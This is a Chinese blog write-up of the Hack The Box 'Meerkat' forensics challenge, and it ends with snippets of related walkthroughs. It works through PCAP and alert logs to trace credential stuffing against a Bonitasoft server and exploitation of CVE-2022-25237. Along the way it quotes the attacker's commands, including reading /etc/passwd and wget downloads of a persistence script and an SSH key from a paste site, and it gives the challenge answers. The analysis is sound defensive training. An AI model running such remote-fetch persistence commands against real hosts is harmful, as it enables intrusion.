[HTB][Sherlocks] Meerkat

2023-12-03 08:12
文章标签 htb sherlocks meerkat

本文主要是介绍[HTB][Sherlocks] Meerkat,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

作为一家快速发展的初创公司,Forela一直在利用商业管理平台。不幸的是,我们的文档很少,而且我们的管理员也不是最有安全意识的。作为我们的新安全提供商,我们希望您查看我们导出的一些PCAP和日志数据,以确认我们是否已经(或没有)被泄露。

TASK 1

题目:我们认为我们的业务管理平台服务器已被破坏。请确认正在运行的应用程序的名称?

image.png

打开分析,端点进行数据分析

image.png

172为内网地址,根据题目意思,那么商业管理平台极大概率在web服务端口(紫色方框),侧重点

image.png

构造过滤表达式,我们需要知道是谁访问了内网地址172的8080端口

tcp.port == 8080 && ip.dst == 172.31.6.44

image.png

看不出来是什么应用程序,googlehacking一下

inurl:/bonita

image.png

image.png

答案:Bonitasoft

TASK 2

题目:我们认为攻击者可能使用了暴力攻击类别的一个子集——所实施的攻击的名称是什么?

进行简单的INFO排序一下,

image.png

还是用的python爆破,仔细一看发现并不是暴力破解,而是撞库攻击

image.png

image.png

image.png

答案:Credential Stuffing

TASK 3

题目:被利用的漏洞是否分配了CVE?如果是,是哪一个?

打开meerkat-alerts.json找记录攻击的警报

之前已经确定了攻击者IP是156.146.62.213 直接搜索

image.png

答案:CVE-2022-25237

TASK 4

题目:攻击者利用哪个字符串附加到API URL路径以绕过授权过滤器?

image.png

image.png

答案:i18ntranslation

TASK 5

题目:在凭证填充攻击中使用了多少个用户名和密码组合?

_(ip.dst == 172.31.6.44 && tcp.port == 8080 && http.request.method == “POST” && http.request.uri contains “/bonita/loginservice”) _

image.png

答案:56

TASK 6

题目:哪个用户名和密码组合成功?

image.png

答案:seb.broom@forela.co.uk:g0vernm3nt

TASK 7

题目:如果有的话,攻击者利用了哪个文本共享网站?

不难看出,攻击者首先上传了一个zip文件,其次利用CVE漏洞,然后执行了whoami命令,最后删除文件

image.png

第二次执行了cat /etc/passwd (很明显换了VPN)

image.png

第三次 下载远程服务器文件

image.png

答案:pastes.

TASK 8

题目:请提供攻击者用于获得对我们主机的持久访问权限的脚本的文件哈希。

wget https://pastes.io/raw/bx5gcr0et8

image.png

image.png

image.png

答案:0dc54416c346584539aa985e9d69a98e

TASK 9

题目:请提供攻击者用于在我们的主机上获得持久性的公钥的文件哈希。

image.png

wget https://pastes.io/raw/hffgra4unv
md5sum hffgra4unv
image.png

答案:dbb906628855a433d70025b6692c05e7

TASK 10 [待补]

TASK 11 [待补]

这篇关于[HTB][Sherlocks] Meerkat的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/448727

相关文章

HTB-You know 0xDiablos

引言 项目概述:HTB的EASY难度 PWN靶机 You know 0xDiablos https://app.hackthebox.com/challenges/106 本文详细解释了溢出payload的结构以及为什么要这样构造,友好的为想要入手PWN的朋友解释了原理技术点涉及: 32位linux逆向、32位程序调用、栈溢出目标与读者:网络安全兴趣爱好者、PWN新手 基本情况 运行看看

HTB-bike(SSTI模版注入)

前言 大家好,我是qmx_07,今天给大家讲解bike靶场 渗透过程 信息搜集 服务器开放了 22 ssh 和 http80端口 Wappalyzer 介绍:Wappalyzer是一种浏览器扩展程序,用于识别正在访问的网站所使用的技术栈和工具,比如使用的web框架,编程语言等 服务器所使用Express框架 发现SSTI模版注入 可以看到这个输入框,用来输出 内容尝试x

HTB-lgnition(curl工具、yakit、 弱口令)

前言 各位师傅大家好,我是qmx_07,今天来讲解lgnition靶机 渗透流程 信息搜集 服务器开放了80 http端口 curl工具 介绍:curl工具是一个用于发送HTTP请求的命令行工具。它支持多种协议,包括HTTP、HTTPS、FTP、SMTP等,并且支持各种常见的操作,如GET、POST、PUT、DELETE等。 -v显示输出与请求和响应相关的详细信息,包括请求头

HTB-Crocodile(FTP和web综合利用)

前言 各位师傅大家好,今天给大家讲解Crocodile靶机 渗透过程 信息搜集 服务器开放了21FTP和80HTTP服务思路:可以尝试 匿名登录FTP 或者 尝试WEB登录后台 FTP匿名登录 通过anonymous 匿名登录到FTP服务器allowed.userlist 和 allowed.usserlist.pass 分别是 账户和密码 Web目录爆破 服务器有

HTB-Mongod(MongoDb数据库)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Mongod靶场 Mongod 渗透过程 RustScan 介绍:Rustscan是一款用Rust语言开发的高速端口扫描器,它可以在3秒内扫描所有65535个端口,并支持脚本引擎和自适应学习功能,并且可以和nmap进行联动可以简单理解成 多线程的nmap扫描器 RustScan安装: 1.创建文件夹mkdir Rustsca

HTB-Redeemer(redis)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Redeemer这台机器,主要是对redis组件进行渗透,了解思路 渗透过程 更改一下 目录结构,先写 渗透过程,再写 题解 信息搜集 通过nmap扫描 发现开启了6379 redis服务,尝试连接注意:nmap 扫描 可以先确定端口开放情况,在进行系统版本扫描,这样会快一些 连接redis数据库 使用redis-cl

入门三.HTB--Dancing(6.18)

大佬 https://www.cnblogs.com/Hekeats-L/p/16535920.html 任务1 SMB 即Server Message Block(服务器消息块),是一种文件共享协议。当文件原件在你的A电脑上,而你想在局域网下用你的手机、iPad或是另一台电脑来访问A电脑上的该文件时,你可能需要用到SMB共享。 任务2 SMB端口服务 nmap -sV

htb_Freelancer

端口扫描 80 88 389 445 扫描ldap协议相关漏洞,没有发现 扫描子域名,加入/etc/hosts(后面发现没用) 枚举域用户 目录扫描,发现一个/admin目录 访问后发现要账号密码 访问80端口,注册一个freelancer用户 查看Blog,底部评论区可看见有用户 点击用户查看,发现修改url中的数字可以查看不同用户 当url为http://freel

htb-linux-1-lame-smb3.0.20

namp smb漏洞 搜索关键词 其他 smb Samba是在linux和unix系统上实现SMB(Server Message Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件和打印机的通信协议,它在局域网内使用linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。

htb-linux-3-shocker

nmap web渗透 由于只有80端口,只考虑目录扫描和静态文件提醒 为什么能能知道http://10.10.10.56/cgi-bin/user.sh? 因为百度的 curl访问该文件 shell flag root